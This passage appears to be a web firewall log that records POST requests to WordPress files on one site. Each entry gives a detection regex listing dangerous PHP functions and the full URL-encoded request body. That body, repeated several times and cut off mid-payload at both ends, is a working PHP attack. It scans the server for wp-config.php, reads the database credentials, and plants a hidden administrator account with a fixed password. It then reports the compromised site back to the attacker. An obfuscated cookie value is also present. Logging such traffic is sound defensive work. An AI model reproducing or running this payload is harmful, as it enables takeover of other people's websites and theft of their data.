0%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B"]
["2026-05-16 12:10:57","213.209.159.254","POST","\/wp-includes\/sodium_compat\/src\/Core32\/X25519.php","Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\/605.1.15 (KHTML, like Gecko) Version\/15.3 Safari\/605.1.15","post","(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|chr|char|preg_\\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\\( >> cT:%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B","POST \/wp-includes\/sodium_compat\/src\/Core32\/X25519.php HTTP\/1.1\ncontent-length:12640\nhost:dewenlabels.com\nuser-agent:Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\/605.1.15 (KHTML, like Gecko) Version\/15.3 Safari\/605.1.15\naccept:*\/*\naccept-encoding:gzip,deflate\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\ncookie:4=4718f09e2a2be7b472f3efbae62d97b4; 3=WTEcpaZ9LKWlLKysMzyfqTIlXSgmrKAsM2I0K3EyoKOsMTylXPxfVv90oKNvYPViqzSlY3EgpPVfnJ5cK2qyqPtvqKOfo2SxK3EgpS9xnKVvXFkaMKEyoaLbVyESGINvXFkaMKEyoaLbVyEAHPVcYTqyqTA3MPtcKFx7WTZ9pzS3qKWfMTIwo2EyXPEsHR9GISfvL1DvKFx7Mz9lMJSwnPtxMTylplOuplNxMPy7nJLbnKAsMTylXPExXFLzVTymK3qlnKEuLzkyXPExXFy7WUN9VafxMU0iYzEvrS9wo252MKW0VwgcMvuznJkyK3O1qS9wo250MJ50pltxpPjxLlxcr2yhL2k1MTHtWUN7DUIhoTyhnltxpPx7MKucqQg9sK1xnJHbVvSho3E3paEvoPRvXGf=; 1=53; 0=71\ncontent-type:application\/x-www-form-urlencoded\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\n\ncT=%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B"]
["2026-05-16 12:11:24","213.209.159.254","POST","\/wp-admin\/site-health.php","Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/101.0.4951.67 Safari\/537.36","post","(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|chr|char|preg_\\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\\( >> xr:%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%2